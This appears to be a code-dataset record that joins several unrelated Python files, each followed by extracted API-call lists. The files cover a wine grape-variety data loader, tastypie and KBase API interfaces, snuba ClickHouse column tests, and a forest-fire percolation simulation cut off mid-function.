from app.models import Cepage
data = []
counter = 0
with open('static_data.tsv', 'r') as file:
for line in file:
if counter == 0:
headers = line.split('\t')
print(len(headers))
else:
print(len(line.split('\t')))
data.append(dict(zip(headers, line.replace('\u202f', '').split('\t'))))
counter += 1
pprint.pprint(data)
for wine in data:
try:
id_ = wine['id']
if len(id_) > 0:
id_ = int(id_)
name = wine[u'Nom du cépage']
regions = wine['Régions']
sous_regions = wine['Sous-régions']
superficie_france = wine['Superficie en France (ha)']
superficie_monde = wine['Superficie mondiale (ha)']
red = wine['Cépage'] == 'Noir'
vignobles = wine['Vignobles']
# changing types
superficie_france = int(superficie_france) if len(superficie_france) > 0 else None
superficie_monde = int(superficie_monde) if len(superficie_monde) > 0 else None
c = Cepage(
id=id_,
name=name,
regions=regions,
vignobles=vignobles,
sous_regions=sous_regions,
superficie_france=superficie_france,
superficie_monde=superficie_monde,
red=red
)
db.session.add(c)
db.session.commit()
except ValueError:
continue
| [
"app.models.Cepage",
"pprint.pprint"
] | [((389, 408), 'pprint.pprint', 'pprint.pprint', (['data'], {}), '(data)\n', (402, 408), False, 'import pprint\n'), ((1090, 1269), 'app.models.Cepage', 'Cepage', ([], {'id': 'id_', 'name': 'name', 'regions': 'regions', 'vignobles': 'vignobles', 'sous_regions': 'sous_regions', 'superficie_france': 'superficie_france', 'superficie_monde': 'superficie_monde', 'red': 'red'}), '(id=id_, name=name, regions=regions, vignobles=vignobles,\n sous_regions=sous_regions, superficie_france=superficie_france,\n superficie_monde=superficie_monde, red=red)\n', (1096, 1269), False, 'from app.models import Cepage\n')] |
from tastypie.api import Api
from encuestas.api.user import UserResource
from encuestas.api.encuesta import EncuestaResource
from encuestas.api.grupo import GrupoResource
from encuestas.api.pregunta import PreguntaResource
from encuestas.api.opcion import OpcionResource
from encuestas.api.link import LinkResource
from encuestas.api.respuesta import RespuestaResource
v1_api = Api(api_name='v1')
v1_api.register(UserResource())
v1_api.register(EncuestaResource())
v1_api.register(GrupoResource())
v1_api.register(PreguntaResource())
v1_api.register(OpcionResource())
v1_api.register(LinkResource())
v1_api.register(RespuestaResource())
| [
"encuestas.api.encuesta.EncuestaResource",
"encuestas.api.link.LinkResource",
"encuestas.api.user.UserResource",
"tastypie.api.Api",
"encuestas.api.grupo.GrupoResource",
"encuestas.api.pregunta.PreguntaResource",
"encuestas.api.opcion.OpcionResource",
"encuestas.api.respuesta.RespuestaResource"
] | [((380, 398), 'tastypie.api.Api', 'Api', ([], {'api_name': '"""v1"""'}), "(api_name='v1')\n", (383, 398), False, 'from tastypie.api import Api\n'), ((415, 429), 'encuestas.api.user.UserResource', 'UserResource', ([], {}), '()\n', (427, 429), False, 'from encuestas.api.user import UserResource\n'), ((447, 465), 'encuestas.api.encuesta.EncuestaResource', 'EncuestaResource', ([], {}), '()\n', (463, 465), False, 'from encuestas.api.encuesta import EncuestaResource\n'), ((483, 498), 'encuestas.api.grupo.GrupoResource', 'GrupoResource', ([], {}), '()\n', (496, 498), False, 'from encuestas.api.grupo import GrupoResource\n'), ((516, 534), 'encuestas.api.pregunta.PreguntaResource', 'PreguntaResource', ([], {}), '()\n', (532, 534), False, 'from encuestas.api.pregunta import PreguntaResource\n'), ((552, 568), 'encuestas.api.opcion.OpcionResource', 'OpcionResource', ([], {}), '()\n', (566, 568), False, 'from encuestas.api.opcion import OpcionResource\n'), ((586, 600), 'encuestas.api.link.LinkResource', 'LinkResource', ([], {}), '()\n', (598, 600), False, 'from encuestas.api.link import LinkResource\n'), ((618, 637), 'encuestas.api.respuesta.RespuestaResource', 'RespuestaResource', ([], {}), '()\n', (635, 637), False, 'from encuestas.api.respuesta import RespuestaResource\n')] |
"""
An interface for handling sets of ReadsAlignments.
"""
from pprint import pprint
from SetAPI.generic.SetInterfaceV1 import SetInterfaceV1
from SetAPI import util
class ReadsAlignmentSetInterfaceV1:
def __init__(self, workspace_client):
self.workspace_client = workspace_client
self.set_interface = SetInterfaceV1(workspace_client)
def save_reads_alignment_set(self, ctx, params):
if 'data' in params and params['data'] is not None:
self._validate_reads_alignment_set_data(params['data'])
else:
raise ValueError('"data" parameter field required to save a ReadsAlignmentSet')
save_result = self.set_interface.save_set(
'KBaseSets.ReadsAlignmentSet',
ctx['provenance'],
params
)
info = save_result[0]
return {
'set_ref': str(info[6]) + '/' + str(info[0]) + '/' + str(info[4]),
'set_info': info
}
def _validate_reads_alignment_set_data(self, data):
# Normalize the object, make empty strings where necessary
if "description" not in data:
data["description"] = ""
if "items" not in data or len(data.get("items", [])) == 0:
raise ValueError("A ReadsAlignmentSet must contain at "
"least one ReadsAlignment reference.")
refs = list()
for item in data["items"]:
refs.append(item["ref"])
if "label" not in item:
item["label"] = ""
ref_list = list(map(lambda r: {"ref": r}, refs))
# Get all the genome ids from our ReadsAlignment references (it's the genome_id key in
# the object metadata). Make a set out of them.
# If there's 0 or more than 1 item in the set, then either those items are bad, or they're
# aligned against different genomes.
info = self.workspace_client.get_object_info3({"objects": ref_list, "includeMetadata": 1})
num_genomes = len(set([item[10]["genome_id"] for item in info["infos"]]))
if num_genomes == 0 or num_genomes > 1:
raise ValueError("All ReadsAlignments in the set must be aligned "
"against the same genome reference.")
def get_reads_alignment_set(self, ctx, params):
"""
If the set is a KBaseSets.ReadsAlignmentSet, it gets returned as-is.
If it's a KBaseRNASeq.RNASeqAlignmentSet, a few things get juggled.
1. We try to figure out the object references for the alignments (which are optional)
2. From each ref, we try to figure out the condition, and apply those as labels (also
might be optional)
"""
set_type, obj_spec = self._check_get_reads_alignment_set_params(params)
include_item_info = False
if 'include_item_info' in params:
if params['include_item_info'] == 1:
include_item_info = True
include_set_item_ref_paths = False
if 'include_set_item_ref_paths' in params:
if params['include_set_item_ref_paths'] == 1:
include_set_item_ref_paths = True
ref_path_to_set = []
if 'ref_path_to_set' in params and len(params['ref_path_to_set']) > 0:
ref_path_to_set = params['ref_path_to_set']
if "KBaseSets" in set_type:
# If it's a KBaseSets type, then we know the usual interface will work...
return self.set_interface.get_set(
params['ref'],
include_item_info,
ref_path_to_set,
include_set_item_ref_paths
)
else:
# ...otherwise, we need to fetch it directly from the workspace and tweak it into the
# expected return object
obj_data = self.workspace_client.get_objects2({"objects": [obj_spec]})["data"][0]
obj = obj_data["data"]
obj_info = obj_data["info"]
alignment_ref_list = list()
if "sample_alignments" in obj:
alignment_ref_list = obj["sample_alignments"]
else:
# this is a list of dicts of random strings -> alignment refs
# need them all as a set, then emit as a list.
reads_to_alignments = obj["mapped_alignments_ids"]
refs = set()
for mapping in reads_to_alignments:
refs.update(mapping.values())
alignment_ref_list = list(refs)
alignment_items = [{"ref": i} for i in alignment_ref_list]
item_infos = self.workspace_client.get_object_info3(
{"objects": alignment_items, "includeMetadata": 1})["infos"]
for idx, ref in enumerate(alignment_items):
alignment_items[idx]["label"] = item_infos[idx][10].get("condition", None)
if include_item_info:
alignment_items[idx]["info"] = item_infos[idx]
"""
If include_set_item_ref_paths is set, then add a field ref_path in alignment items
"""
if include_set_item_ref_paths:
util.populate_item_object_ref_paths(alignment_items, obj_spec)
return {
"data": {
"items": alignment_items,
"description": ""
},
"info": obj_info
}
def _check_get_reads_alignment_set_params(self, params):
if 'ref' not in params or params['ref'] is None:
raise ValueError('"ref" parameter field specifiying the reads alignment set is required')
elif not util.check_reference(params['ref']):
raise ValueError('"ref" parameter must be a valid workspace reference')
if 'include_item_info' in params:
if params['include_item_info'] not in [0, 1]:
raise ValueError('"include_item_info" parameter field can only be set to 0 or 1')
obj_spec = util.build_ws_obj_selector(params.get('ref'), params.get('ref_path_to_set', []))
info = self.workspace_client.get_object_info3({"objects": [obj_spec]})
return info["infos"][0][2], obj_spec
| [
"SetAPI.util.populate_item_object_ref_paths",
"SetAPI.util.check_reference",
"SetAPI.generic.SetInterfaceV1.SetInterfaceV1"
] | [((325, 357), 'SetAPI.generic.SetInterfaceV1.SetInterfaceV1', 'SetInterfaceV1', (['workspace_client'], {}), '(workspace_client)\n', (339, 357), False, 'from SetAPI.generic.SetInterfaceV1 import SetInterfaceV1\n'), ((5211, 5273), 'SetAPI.util.populate_item_object_ref_paths', 'util.populate_item_object_ref_paths', (['alignment_items', 'obj_spec'], {}), '(alignment_items, obj_spec)\n', (5246, 5273), False, 'from SetAPI import util\n'), ((5710, 5745), 'SetAPI.util.check_reference', 'util.check_reference', (["params['ref']"], {}), "(params['ref'])\n", (5730, 5745), False, 'from SetAPI import util\n')] |
import collections
import inspect
import json
import jsonschema
import os
import sys
from pprint import pprint
from slugify import slugify
from ...dicthelpers import data_merge
from ..basestore import LinkedStore, linkages
from ..basestore import HeritableDocumentSchema, JSONSchemaCollection, formatChecker
from ..basestore import CatalogUpdateFailure
from ...stores import abspath
from ...utils import normalize, normpath
from ...filetypes import infer_filetype
DEFAULT_LINK_FIELDS = list()
class ProcessUpdateFailure(CatalogUpdateFailure):
pass
class ProcessDocument(HeritableDocumentSchema):
"""Defines metadata for a Process Entity"""
def __init__(self, inheritance=True, **kwargs):
super(ProcessDocument, self).__init__(inheritance, **kwargs)
self.update_id()
class ProcessRecord(collections.UserDict):
"""New document for ProcessStore with schema enforcement"""
def __init__(self, value, *args, **kwargs):
# if 'file_id' not in value:
# value['file_id'] = 'file.tacc.' + uuid.uuid1().hex
value = dict(value)
self.schema = ProcessDocument()
for k in self.schema.filter_keys():
try:
del value[k]
except KeyError:
pass
jsonschema.validate(value, self.schema.to_dict(),
format_checker=formatChecker())
super().__init__(value, *args, **kwargs)
class ProcessStore(LinkedStore):
"""Manage storage and retrieval of ProcessDocument records"""
LINK_FIELDS = DEFAULT_LINK_FIELDS
def __init__(self, mongodb, config={}, session=None, **kwargs):
super(ProcessStore, self).__init__(mongodb, config, session)
schema = ProcessDocument(**kwargs)
super(ProcessStore, self).update_attrs(schema)
self.setup(update_indexes=kwargs.get('update_indexes', False))
def add_update_document(self, document_dict, uuid=None, token=None, strategy='merge'):
if 'process_id' not in document_dict:
suggested_id = encode_name(document_dict['name'])
raise KeyError("Process document must have a 'processe_id'. " +
"Based on the provided name, here is a suggestion: {}".format(suggested_id))
return super().add_update_document(document_dict,
uuid=uuid, token=token,
strategy=strategy)
def get_typeduuid(self, payload, binary=False):
identifier_string = None
if isinstance(payload, dict):
if 'name' in payload:
payload['name'] = normpath(payload['name'])
identifier_string = self.get_linearized_values(payload)
else:
identifier_string = normpath(str(payload))
# print('IDENTIFIER.string', identifier_string)
return super().get_typeduuid(identifier_string, binary)
class StoreInterface(ProcessStore):
pass
def encode_name(textstring, separator='_', stopwords=[], case_insensitive=False):
return separator.join(slug for slug in slugify(
textstring, stopwords=stopwords,
lowercase=case_insensitive).split('-'))
| [
"slugify.slugify"
] | [((3095, 3163), 'slugify.slugify', 'slugify', (['textstring'], {'stopwords': 'stopwords', 'lowercase': 'case_insensitive'}), '(textstring, stopwords=stopwords, lowercase=case_insensitive)\n', (3102, 3163), False, 'from slugify import slugify\n')] |
from copy import deepcopy
import pytest
from snuba.clickhouse.columns import (
UUID,
AggregateFunction,
Array,
ColumnType,
Date,
DateTime,
Enum,
FixedString,
Float,
IPv4,
IPv6,
Nested,
ReadOnly,
)
from snuba.clickhouse.columns import SchemaModifiers as Modifier
from snuba.clickhouse.columns import String, UInt
TEST_CASES = [
pytest.param(
String(Modifier(nullable=True)),
String(),
String(),
"Nullable(String)",
id="strings",
),
pytest.param(
UUID(Modifier(readonly=True)),
UUID(),
UUID(Modifier(nullable=True)),
"UUID",
id="UUIDs",
),
pytest.param(IPv4(None), IPv4(), IPv4(Modifier(nullable=True)), "IPv4", id="IPs",),
pytest.param(IPv6(None), IPv6(), IPv6(Modifier(nullable=True)), "IPv6", id="IPs",),
pytest.param(
FixedString(32, Modifier(nullable=True)),
FixedString(32),
FixedString(64, Modifier(nullable=True)),
"Nullable(FixedString(32))",
id="fixed strings",
),
pytest.param(
UInt(8, Modifier(nullable=True)),
UInt(8),
UInt(16, Modifier(nullable=True)),
"Nullable(UInt8)",
id="integers",
),
pytest.param(
Float(64, Modifier(nullable=True)),
Float(64),
Float(32, Modifier(nullable=True)),
"Nullable(Float64)",
id="floats",
),
pytest.param(Date(), Date(), Date(Modifier(nullable=True)), "Date", id="dates",),
pytest.param(
DateTime(),
DateTime(),
DateTime(Modifier(nullable=True)),
"DateTime",
id="datetimes",
),
pytest.param(
Array(String(Modifier(nullable=True))),
Array(String()),
Array(String()),
"Array(Nullable(String))",
id="arrays",
),
pytest.param(
Nested(
[("key", String()), ("val", String(Modifier(nullable=True)))],
Modifier(nullable=True),
),
Nested([("key", String()), ("val", String())]),
Nested([("key", String()), ("val", String())], Modifier(nullable=True)),
"Nullable(Nested(key String, val Nullable(String)))",
id="nested",
),
pytest.param(
AggregateFunction("uniqIf", [UInt(8), UInt(32)], Modifier(nullable=True)),
AggregateFunction("uniqIf", [UInt(8), UInt(32)]),
AggregateFunction("uniqIf", [UInt(8)], Modifier(nullable=True)),
"Nullable(AggregateFunction(uniqIf, UInt8, UInt32))",
id="aggregated",
),
pytest.param(
Enum([("a", 1), ("b", 2)], Modifier(nullable=True)),
Enum([("a", 1), ("b", 2)]),
Enum([("a", 1), ("b", 2)]),
"Nullable(Enum('a' = 1, 'b' = 2))",
id="enums",
),
]
@pytest.mark.parametrize("col_type, raw_type, different_type, for_schema", TEST_CASES)
def test_methods(
col_type: ColumnType,
raw_type: ColumnType,
different_type: ColumnType,
for_schema: str,
) -> None:
assert col_type == deepcopy(col_type)
assert col_type != different_type
# Test it is not equal to a type of different class.
assert col_type != ColumnType(Modifier(readonly=True))
assert col_type.for_schema() == for_schema
assert col_type.get_raw() == raw_type
modified = col_type.set_modifiers(col_type.get_modifiers())
assert modified is not col_type
assert modified == col_type
assert col_type.set_modifiers(Modifier(readonly=True)).has_modifier(ReadOnly)
| [
"snuba.clickhouse.columns.IPv6",
"snuba.clickhouse.columns.Date",
"snuba.clickhouse.columns.UUID",
"snuba.clickhouse.columns.DateTime",
"snuba.clickhouse.columns.Float",
"pytest.mark.parametrize",
"snuba.clickhouse.columns.SchemaModifiers",
"snuba.clickhouse.columns.UInt",
"snuba.clickhouse.columns.... | [((2792, 2881), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""col_type, raw_type, different_type, for_schema"""', 'TEST_CASES'], {}), "('col_type, raw_type, different_type, for_schema',\n TEST_CASES)\n", (2815, 2881), False, 'import pytest\n'), ((448, 456), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (454, 456), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((466, 474), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (472, 474), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((598, 604), 'snuba.clickhouse.columns.UUID', 'UUID', ([], {}), '()\n', (602, 604), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((705, 715), 'snuba.clickhouse.columns.IPv4', 'IPv4', (['None'], {}), '(None)\n', (709, 715), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((717, 723), 'snuba.clickhouse.columns.IPv4', 'IPv4', ([], {}), '()\n', (721, 723), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((793, 803), 'snuba.clickhouse.columns.IPv6', 'IPv6', (['None'], {}), '(None)\n', (797, 803), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((805, 811), 'snuba.clickhouse.columns.IPv6', 'IPv6', ([], {}), '()\n', (809, 811), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((940, 955), 'snuba.clickhouse.columns.FixedString', 'FixedString', (['(32)'], {}), '(32)\n', (951, 955), False, 'from 
snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((1147, 1154), 'snuba.clickhouse.columns.UInt', 'UInt', (['(8)'], {}), '(8)\n', (1151, 1154), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((1326, 1335), 'snuba.clickhouse.columns.Float', 'Float', (['(64)'], {}), '(64)\n', (1331, 1335), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((1455, 1461), 'snuba.clickhouse.columns.Date', 'Date', ([], {}), '()\n', (1459, 1461), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((1463, 1469), 'snuba.clickhouse.columns.Date', 'Date', ([], {}), '()\n', (1467, 1469), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((1550, 1560), 'snuba.clickhouse.columns.DateTime', 'DateTime', ([], {}), '()\n', (1558, 1560), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((1570, 1580), 'snuba.clickhouse.columns.DateTime', 'DateTime', ([], {}), '()\n', (1578, 1580), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((2652, 2678), 'snuba.clickhouse.columns.Enum', 'Enum', (["[('a', 1), ('b', 2)]"], {}), "([('a', 1), ('b', 2)])\n", (2656, 2678), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((2688, 2714), 'snuba.clickhouse.columns.Enum', 'Enum', (["[('a', 1), ('b', 2)]"], {}), "([('a', 1), 
('b', 2)])\n", (2692, 2714), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((3035, 3053), 'copy.deepcopy', 'deepcopy', (['col_type'], {}), '(col_type)\n', (3043, 3053), False, 'from copy import deepcopy\n'), ((414, 437), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (422, 437), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((564, 587), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'readonly': '(True)'}), '(readonly=True)\n', (572, 587), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((619, 642), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (627, 642), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((730, 753), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (738, 753), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((818, 841), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (826, 841), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((906, 929), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (914, 929), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((981, 1004), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (989, 1004), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1113, 1136), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1121, 1136), True, 'from snuba.clickhouse.columns import SchemaModifiers as 
Modifier\n'), ((1173, 1196), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1181, 1196), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1292, 1315), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1300, 1315), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1355, 1378), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1363, 1378), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1476, 1499), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1484, 1499), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1599, 1622), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1607, 1622), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1756, 1764), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (1762, 1764), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((1781, 1789), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (1787, 1789), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((1976, 1999), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1984, 1999), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((2123, 2146), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (2131, 2146), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((2314, 2337), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (2322, 2337), True, 'from snuba.clickhouse.columns import 
SchemaModifiers as Modifier\n'), ((2445, 2468), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (2453, 2468), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((2618, 2641), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (2626, 2641), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((3183, 3206), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'readonly': '(True)'}), '(readonly=True)\n', (3191, 3206), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1715, 1738), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1723, 1738), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((2294, 2301), 'snuba.clickhouse.columns.UInt', 'UInt', (['(8)'], {}), '(8)\n', (2298, 2301), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2303, 2311), 'snuba.clickhouse.columns.UInt', 'UInt', (['(32)'], {}), '(32)\n', (2307, 2311), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2377, 2384), 'snuba.clickhouse.columns.UInt', 'UInt', (['(8)'], {}), '(8)\n', (2381, 2384), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2386, 2394), 'snuba.clickhouse.columns.UInt', 'UInt', (['(32)'], {}), '(32)\n', (2390, 2394), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2435, 2442), 'snuba.clickhouse.columns.UInt', 'UInt', (['(8)'], {}), '(8)\n', (2439, 2442), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((3466, 3489), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'readonly': '(True)'}), '(readonly=True)\n', (3474, 3489), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1910, 1918), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (1916, 1918), False, 'from 
snuba.clickhouse.columns import String, UInt\n'), ((2036, 2044), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (2042, 2044), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2055, 2063), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (2061, 2063), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2092, 2100), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (2098, 2100), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2111, 2119), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (2117, 2119), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((1936, 1959), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1944, 1959), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n')] |
from collections import defaultdict
import itertools
import os
import pickle
import time
import warnings

import numpy as np

from Analysis import binomial_pgf, BranchModel, StaticModel
from simulators.fires.UrbanForest import UrbanForest
from Policies import NCTfires, UBTfires, DWTfires, RHTfires, USTfires
from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control
# Escalate every numpy floating-point error condition (divide, overflow,
# invalid, underflow) to an exception instead of a silent runtime warning.
np.seterr(all='raise')
def uniform():
    """Build spatially-uniform lattice parameters and their equivalent controls.

    Returns:
        tuple: ``(alpha, beta, lattice_p, control_p, control_ab)`` --
        defaultdicts mapping any key to, respectively, the scalar growth
        parameter, the scalar decay parameter, the percolation probability,
        the percolation control magnitude, and the
        ``(delta_alpha, delta_beta)`` control pair.

    Raises:
        Warning: if the percolation parameter is not supercritical, or if
        the control cannot drive it below criticality.
    """
    # given alpha and beta, compute lattice probabilities for every (parent, child) pair
    a = 0.2763
    b = np.exp(-1/10)

    p = percolation_parameter(a, b)
    if p <= 0.5:
        raise Warning('Percolation parameter {0:0.2f} is not supercritical'.format(p))
    lattice_p = defaultdict(lambda: p)

    # given (delta_alpha, delta_beta), construct the equivalent delta_p
    delta_a = 0
    delta_b = 0.4
    dp = equivalent_percolation_control(a, b, delta_a, delta_b)
    if p - dp >= 0.5:
        raise Warning('Control is insufficient: p - dp = {0:0.2f} - {1:0.2f} = {2:0.2f}'.format(p, dp, p-dp))
    control_p = defaultdict(lambda: dp)
    control_ab = defaultdict(lambda: (delta_a, delta_b))

    # BUG FIX: the original code rebound `a` and `b` to the defaultdicts
    # themselves (`a = defaultdict(lambda: a)`), so the lambda resolved `a`
    # at call time to the dict -- every lookup returned the map itself
    # instead of the scalar parameter. Capture the scalars first.
    a_value, b_value = a, b
    a = defaultdict(lambda: a_value)
    b = defaultdict(lambda: b_value)

    return a, b, lattice_p, control_p, control_ab
def nonuniform(simulation):
    """Construct spatially-varying parameters for an urban-forest lattice.

    Args:
        simulation: lattice simulator exposing ``dims``, ``urban_width`` and
            ``group`` (mapping of cell -> object with ``neighbors``).

    Returns:
        tuple: ``(alpha_set, beta_set, initial_fire, control_gmdp, p_set)``.
    """
    alpha_set = dict()
    beta_set = dict()
    p_set = dict()
    control_gmdp = dict()
    delta_beta = 0.35

    rows, cols = simulation.dims[0], simulation.dims[1]

    # growth parameter increases linearly from left column to right column
    alpha_start = 0.2
    alpha_end = 0.4
    for r in range(rows):
        for c in range(cols):
            alpha_set[(r, c)] = alpha_start + (c/(cols-1))*(alpha_end-alpha_start)

    # the forest burns with beta1; the urban strip on the right with beta2
    beta1 = np.exp(-1/5)
    beta2 = np.exp(-1/10)
    for r in range(rows):
        for c in range(cols):
            beta_set[(r, c)] = beta1 if c < cols - simulation.urban_width else beta2
            control_gmdp[(r, c)] = {'healthy': (alpha_set[(r, c)], 0),
                                    'on_fire': (0, np.amin([delta_beta, beta_set[(r, c)]]))}

    # ignite a plus-shaped pattern around the lattice center: keep every
    # offset in [-2, 2]^2 except the center, corners and diagonals, i.e.
    # exactly those with |dr| != |dc| (equivalent to the original three skips)
    r_center = np.floor((rows-1)/2).astype(np.uint8)
    c_center = np.floor((cols-1)/2).astype(np.uint8)
    initial_fire = [(r_center + dr, c_center + dc)
                    for dr, dc in itertools.product(range(-2, 3), repeat=2)
                    if abs(dr) != abs(dc)]

    # percolation probability for every (tree, neighbor) edge
    for tree_rc, tree in simulation.group.items():
        for neighbor in tree.neighbors:
            p = percolation_parameter(alpha_set[neighbor], beta_set[tree_rc])
            if p <= 0.5:
                warnings.warn('p({0:0.2f}, {1:0.2f}) = {2:0.2f} <= 0.5'.format(alpha_set[neighbor],
                                                                               beta_set[tree_rc], p))
            p_set[(tree_rc, neighbor)] = p

    return alpha_set, beta_set, initial_fire, control_gmdp, p_set
def benchmark(simulation, branchmodel, policy, num_generations=1, num_simulations=1):
    """Run `policy` on `simulation` for seeded runs and pickle summary stats.

    Args:
        simulation: forest simulator; reset per seed and stepped until
            ``early_end`` becomes True.
        branchmodel: branching-process approximation, rebuilt every step.
        policy: control policy; ``USTfires`` policies additionally drive a
            ``StaticModel`` of the urban boundary.
        num_generations: branching generations expanded per simulation step.
        num_simulations: number of independent seeded runs.

    Side effects:
        Writes ``results/<policy.name>_s<num_simulations>.pkl`` and prints
        timing plus median statistics.
    """
    print('Running policy {0:s} with capacity {1:d} for {2:d} simulations'.format(policy.name,
                                                                                 policy.capacity,
